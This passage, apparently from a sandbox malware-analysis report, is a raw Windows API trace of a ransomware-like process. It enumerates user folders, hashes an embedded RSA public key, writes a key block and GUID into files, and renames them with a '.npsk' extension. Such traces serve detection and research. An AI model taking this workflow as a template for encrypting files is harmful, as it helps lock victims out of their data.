GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=28954) returned 1 [0217.713] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.715] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x70f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.715] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.716] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x711a, lpOverlapped=0x0) returned 1 [0217.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.717] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0217.718] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.718] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.718] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.718] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.718] GetLastError () returned 0x0 [0217.718] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.718] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0217.718] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.718] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.718] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.719] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.719] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x711a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.719] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.719] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.719] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.719] CloseHandle (hObject=0x61c) returned 1 [0217.720] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\mwxtzhqsL3Do.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\mwxtzhqsl3do.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\mwxtzhqsL3Do.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\mwxtzhqsl3do.m4a.npsk")) returned 1 [0217.722] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72b4c460, ftCreationTime.dwHighDateTime=0x1d5e7f9, ftLastAccessTime.dwLowDateTime=0x8eb91a70, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x8eb91a70, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pAmb2w5Ag3o", cAlternateFileName="PAMB2W~1")) returned 1 [0217.722] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72b4c460, ftCreationTime.dwHighDateTime=0x1d5e7f9, ftLastAccessTime.dwLowDateTime=0x8eb91a70, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x8eb91a70, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pAmb2w5Ag3o", cAlternateFileName="PAMB2W~1")) returned 0 [0217.722] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.723] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.723] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.723] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0217.723] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0217.723] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0217.723] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.723] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.723] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.723] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.723] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.723] PathFindFileNameW (pszPath="") returned="" [0217.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.725] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.725] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0217.725] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0217.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.727] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=42495) returned 1 [0217.727] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.728] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.728] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.730] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa5ff, lpOverlapped=0x0) returned 1 [0217.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.731] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0217.734] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.735] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.735] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.735] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.735] GetLastError () returned 0x0 [0217.735] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.735] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0217.735] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.735] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.735] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.735] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.736] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa5ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.736] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.736] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.736] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.736] CloseHandle (hObject=0x61c) returned 1 [0217.738] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.npsk")) returned 1 [0217.740] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0217.740] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0217.740] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0217.740] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0217.740] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.740] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.740] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0217.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0217.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0217.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.744] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.744] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.744] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.744] PathFindFileNameW (pszPath="") returned="" [0217.744] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.745] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.745] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0217.745] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0217.745] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.746] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.746] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0217.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0217.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.746] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.746] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.746] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.746] PathFindFileNameW (pszPath="") returned="" [0217.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.750] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.751] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, 